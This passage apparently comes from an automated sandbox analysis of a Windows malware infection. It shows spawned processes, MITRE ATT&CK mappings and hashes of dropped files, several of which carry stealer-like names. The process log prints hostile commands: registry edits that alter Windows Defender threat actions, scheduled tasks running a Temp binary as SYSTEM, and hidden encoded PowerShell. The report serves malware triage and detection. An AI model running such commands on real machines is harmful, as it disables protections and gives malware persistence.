REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:1784
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 01:37:33 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\QUxgGGM.exe\" GH /aoJSdiduR 385118 /S" /V1 /F
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                PID:708
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                schtasks /run /I /tn "XyyyteIMwZeutaZuw"
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:852
                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                PID:4516
                                                                                                                                                                                                                                              • C:\Windows\windefender.exe
                                                                                                                                                                                                                                                C:\Windows\windefender.exe
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:1568
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:5132
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:1572
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:4720
                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                        PID:5400
                                                                                                                                                                                                                                                      • C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\QUxgGGM.exe
                                                                                                                                                                                                                                                        C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\QUxgGGM.exe GH /aoJSdiduR 385118 /S
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:5440

                                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                                                                                                        Execution

                                                                                                                                                                                                                                                        Command and Scripting Interpreter

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1059

                                                                                                                                                                                                                                                        PowerShell

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1059.001

                                                                                                                                                                                                                                                        System Services

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1569

                                                                                                                                                                                                                                                        Service Execution

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1569.002

                                                                                                                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                                                                        Create or Modify System Process

                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                        T1543

                                                                                                                                                                                                                                                        Windows Service

                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                        T1543.003

                                                                                                                                                                                                                                                        Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1547

                                                                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1547.001

                                                                                                                                                                                                                                                        Pre-OS Boot

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1542

                                                                                                                                                                                                                                                        Bootkit

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1542.003

                                                                                                                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                        Privilege Escalation

                                                                                                                                                                                                                                                        Abuse Elevation Control Mechanism

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1548

                                                                                                                                                                                                                                                        Bypass User Account Control

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1548.002

                                                                                                                                                                                                                                                        Create or Modify System Process

                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                        T1543

                                                                                                                                                                                                                                                        Windows Service

                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                        T1543.003

                                                                                                                                                                                                                                                        Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1547

                                                                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1547.001

                                                                                                                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                                                                                        Abuse Elevation Control Mechanism

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1548

                                                                                                                                                                                                                                                        Bypass User Account Control

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1548.002

                                                                                                                                                                                                                                                        Impair Defenses

                                                                                                                                                                                                                                                        4
                                                                                                                                                                                                                                                        T1562

                                                                                                                                                                                                                                                        Disable or Modify Tools

                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                        T1562.001

                                                                                                                                                                                                                                                        Disable or Modify System Firewall

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1562.004

                                                                                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                                                                                        4
                                                                                                                                                                                                                                                        T1112

                                                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                                                        Pre-OS Boot

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1542

                                                                                                                                                                                                                                                        Bootkit

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1542.003

                                                                                                                                                                                                                                                        Subvert Trust Controls

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1553

                                                                                                                                                                                                                                                        Install Root Certificate

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1553.004

                                                                                                                                                                                                                                                        Credential Access

                                                                                                                                                                                                                                                        Unsecured Credentials

                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                        T1552

                                                                                                                                                                                                                                                        Credentials In Files

                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                        T1552.001

                                                                                                                                                                                                                                                        Discovery

                                                                                                                                                                                                                                                        Query Registry

                                                                                                                                                                                                                                                        7
                                                                                                                                                                                                                                                        T1012

                                                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                                                        System Information Discovery

                                                                                                                                                                                                                                                        5
                                                                                                                                                                                                                                                        T1082

                                                                                                                                                                                                                                                        Collection

                                                                                                                                                                                                                                                        Data from Local System

                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                        T1005

                                                                                                                                                                                                                                                        Command and Control

                                                                                                                                                                                                                                                        Web Service

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1102

                                                                                                                                                                                                                                                        Impact

                                                                                                                                                                                                                                                        Service Stop

                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                        T1489

                                                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                                                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          288KB

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          d9ec6f3a3b2ac7cd5eef07bd86e3efbc

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          e1908caab6f938404af85a7df0f80f877a4d9ee6

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4

                                                                                                                                                                                                                                                        • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          2.5MB

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          e6943a08bb91fc3086394c7314be367d

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          451d2e171f906fa6c43f8b901cd41b0283d1fa40

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          aafdcfe5386452f4924cfcc23f2cf7eccf3f868947ad7291a77b2eca2af0c873

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          505d3c76988882602f06398e747c4e496ecad9df1b7959069b87c8111c4d9118484f4d6baef5f671466a184c8caec362d635da210fa0987ccb746cbeea218d2a

                                                                                                                                                                                                                                                        • C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          6.2MB

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          1bacbebf6b237c75dbe5610d2d9e1812

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          3ca5768a9cf04a2c8e157d91d4a1b118668f5cf1

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          c3747b167c70fd52b16fb93a4f815e7a4ee27cf67d2c7d55ea9d1edc7969c67d

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          f6438eced6915890d5d15d853c3ad6856de949b7354dcea97b1cf40d0c8aed767c8e45730e64ab0368f3606da5e95fd1d4db9cc21e613d517f37ddebbd0fa1fe

                                                                                                                                                                                                                                                        • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          13.2MB

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          72b396a9053dff4d804e07ee1597d5e3

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          5ec4fefa66771613433c17c11545c6161e1552d5

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          d0b206f0f47a9f8593b6434dc27dadde8480a902e878882fa8c73fc7fe01b11d

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          ad96c9ca2feae7af7fcf01a843d5aa6cbdde0520d68dedff44554a17639c6c66b2301d73daf272708cb76c22eae2d5c89db23af45105c4f0e35f4787f98e192b

                                                                                                                                                                                                                                                        • C:\Program Files (x86)\GameSyncLink\installc.bat
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          301B

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          998ab24316795f67c26aca0f1b38c8ce

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          a2a6dc94e08c086fe27f8c08cb8178e7a64f200d

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          a468b43795f1083fb37b12787c5ff29f8117c26ac35af470084e00c48280442e

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          7c9c2ade898a8defb6510ddd15730bec859d4474071eb6b8e8738ea6089764f81924ad2a6ebf0479d4fed7d61890edaa38f4bfbf70a4e6b30d33aa5bfc5b5c75

                                                                                                                                                                                                                                                        • C:\Program Files (x86)\GameSyncLink\installg.bat
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          284B

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          5dee3cbf941c5dbe36b54690b2a3c240

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          82b9f1ad3ca523f3794e052f7e67ecdcd1ae87e1

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          98370b86626b8fd7a7cac96693348045b081326c49e2421113f49a5ea3588edb

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          9ee431d485e2f09268a22b287b0960859d2f22db8c7e61309a042999c436b3de74f5d75837b739e01122a796ad65bc6468d009ec6ddf4962f4ff288155410556

                                                                                                                                                                                                                                                        • C:\Program Files (x86)\GameSyncLink\installm.bat
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          218B

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          94b87b86dc338b8f0c4e5869496a8a35

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          2584e6496d048068f61ac72f5c08b54ad08627c3

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          2928d8e9a41f39d3802cfd2900d8edeb107666baa942d9c0ffbfd0234b5e5bfc

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          b67eb73fe51d4dba990789f1e0123e902dac6d26569851c3d51ca0a575221ce317f973999d962669016017d8f81a01f11bd977609e66bb1b244334bce2db5d5d

                                                                                                                                                                                                                                                        • C:\ProgramData\build.exe
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          95KB

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          16280875fdcf55ab4c8f1dff6dabc72e

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          39880e6fbb258f4f4fa5c79337ec893acae55fb7

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          91455ac8837ff1fdba7067cd3e7f790c1649ae70164ccbdf0483eae831a7253a

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          53ba4e5e88a8f19ba3faa2f1244501c2d62827a9178ec0fdc995582e03e7d8e39f2dfd7bde11285781a65a021d4f4aab48b94be66a8a1cebbd47ab0cb819202e

                                                                                                                                                                                                                                                        • C:\ProgramData\mozglue.dll
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          593KB

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                                                                                                                                        • C:\ProgramData\system.exe
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          75KB

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          70b9f8ef4c4ce24fe372b292aebcd138

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          5fd7ce9318727b27db0dd50effbb632686d53f8c

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          15af516d88e83cfc8d3deebe7aeb9ccaebc558fc93544ef31b612113fcce907b

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          b4658ccb665aa9f43cc049a51c477a0b314c5c13d254d648e34f9feca9feb06021bbf271857f73998e31cc7f877fa5457fbe7420beb58f3563fbfbe121a4cbad

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\[email protected]
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          656B

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          184a117024f3789681894c67b36ce990

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          c5b687db3b27ef04ad2b2cbc9f4e523cb7f6ba7e

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          b10d5fef165fc89e61cd16e02eac1b90b8f94ef95218bdd4b678cd0d5c8a925e

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          354d3bbc1329cbbe30d22f0cf95564e44acc68d6fe91e2beb4584a473d320faf4c092de9db7f1f93cf0b235703fc8de913883985c7d5db6b596244771a1edaf7

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          830B

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          e6edb41c03bce3f822020878bde4e246

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          03198ad7bbfbdd50dd66ab4bed13ad230b66e4d9

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          9fa80f0889358d9db3d249a2e747e27b7c01c6123b784d94d169c0e54cacf454

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          2d71b7d50212f980e82562af95598c430aa0875f7a9d9cc670ba2cb1f63057fb26fd747a99cb4ca08f2355d002daa79bda2236b3ad9e37a3cfef32ae5420e2a1

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          2.2MB

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          ebc2640384e061203dcf9efb12a67cd9

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          3fb2340408a4a61647fefa97766f4f82d41069f7

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          c7f29056f46d16f7500f5356adaa2ef637aaf5cade2b9a78f3bcd95c0e6ec207

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          50f038e54234ca439d106cec8d2c7f48f9a1d93f396e5c4a5230215b4fa4e5277fe20fe8c7cdf798f0280f712d06b330d6552ae9160dd7fcb6c4cf1aa13ce173

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000004001\crypted333.exe
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          474KB

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          e967f019b01357086d92181e6ee28e0b

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          7f26480ea5ca0ee9481dfc0bea12194bd6f10283

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          c69c17f4c6b2206437e7954c02424b80605d40e98c0adcad6839e170c94b1c82

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          dd2abe993397cf9f117753fd71ed9f98c4952616ee30f10479fbc3dad93a88dcfbfd6b80083541c7a796936dd37667a0f178156bdf5c35abf76dd8b23015d88a

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          304KB

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          9faf597de46ed64912a01491fe550d33

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          49203277926355afd49393782ae4e01802ad48af

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          0854678d655668c8ebb949c990166e26a4c04aef4ecf0191a95693ca150a9715

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          ef8a7a8566eaf962c4e21d49d9c1583ed2cdc9c2751ce75133a9765d2fa6dc511fc6cc99ea871eb83d50bd08a31cb0b25c03f27b8e6f351861231910a6cf1a1e

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4.2MB

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          0f52e5e68fe33694d488bfe7a1a71529

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          11d7005bd72cb3fd46f24917bf3fc5f3203f361f

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          efd29c35766c607aa15d1cb83dec625739791b1616ad37d5b47e78cdb8a42ca8

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          238fbb1c04eef2f2005cb7abf0223e3cd062d9d2840966292e19dcaa495609e134a0bdc35389ae9925ecfc787a13772d3ac7b29058579f702bc849dd0343c400

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000007001\swizzzz.exe
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          778KB

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          05b11e7b711b4aaa512029ffcb529b5a

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          a8074cf8a13f21617632951e008cdfdace73bb83

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          2aab2ca39749b21877d1c52526009f9f5d251d934205e9f671a9e84cecd55afa

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          dde7b561ffb3b9fe71827be9313cd3b83900c3ce76b053d028e84223fba1b06035437b3860a74de7dc2f5d40f0b90bd7d60139701d752c803eb08f362a5d57ff

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          56e7d98642cfc9ec438b59022c2d58d7

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          26526f702e584d8c8b629b2db5d282c2125665d7

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          a2aa61942bae116f8c855fda0e9a991dba92b3a1e2f147aee0e7e2be1bdea383

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          0be0b11de472029bd4e2268cddb5ddb381f7f275dfe50c47b9c836980e5cbfa7f71fe78804ef2180ee110ca9cf36944ec8b8b22babb31a1fc7a6585f79932a1f

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000013001\amers.exe
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          1.8MB

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          26c16cbabb663581ab5bb0b1e4df0b11

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          6d2c0e3ae9cca3b84bd670c69156a834958b02dd

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          9a2e33461419ba0432c0ae3b6a71d9b331db421be7bde4145584f6d3abc340f4

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          09adf9f4c6b75b1260f768df2a0ff38329d0b503d24d4d000dd58d48f13a223cc0ff3c79226977aa6ff02552042874d7cfd7e2a24ef65db0c6daf7bf7f5dfb40

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000014001\0e62ba0552.exe
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          2.2MB

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          60a4d0ed73121dc2663ad70328ce3116

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          68414c5277048ee5df996d36cdf4f2bfdcb4145a

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          ea0282895ea1b9aa692fa3ef59414cbdb097bdd39d46e9a9e981f54ab2d8108c

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          98b36ff5e39723f4f1530d51288308d4857f9aac2d22899c234a6ffac41c893b7a732ca4a100311f0c52b11c325f2cb9bba574b2f893a7cd8ad955877c28c2cd

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          418KB

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          0099a99f5ffb3c3ae78af0084136fab3

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          0205a065728a9ec1133e8a372b1e3864df776e8c

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          764KB

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          e45dcabc64578b3cf27c5338f26862f1

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          1c376ec14025cabe24672620dcb941684fbd42b3

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          b05176b5e31e9e9f133235deb31110798097e21387d17b1def7c3e2780bbf455

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          5d31565fbb1e8d0effebe15edbf703b519f6eb82d1b4685661ce0efd6a25d89596a9de27c7690c7a06864ce957f8f7059c8fdee0993023d764168c3f3c1b8da9

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000052001\ReurgingGleek.exe
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          596KB

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          1d3535cc01b2cc54b808a55e945707a0

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          a9a563b8ee37f17c847248bb207b28086d9f4628

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          f5faa2b827aaae846580fe313cfc3562fcf04dbf26320c7190247621c7e10f19

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          4c344a2abc7ace17a3fced1e3fcf09ac959b47d8bc1a5bf4280d46c3dccd015254a42ce722f93bbbe28f9866696db685df6209b4e863fa9e02772753eeb2ebbc

                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSF3C1.tmp\Install.exe
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          6.4MB

                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                          220a02a940078153b4063f42f206087b

                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                          02fc647d857573a253a1ab796d162244eb179315

                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                          7eb93d93b03447a6bafd7e084305d41bf9780bd415cb2e70020952d06f3d7b60

                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                          42ac563a7c28cbf361bfb150d5469f0278ab87ce445b437eef8425fb779689d70230b550815f30f9db2909c1ba0dd015b172dfe3e718d26706856f4cb0eeeeaa

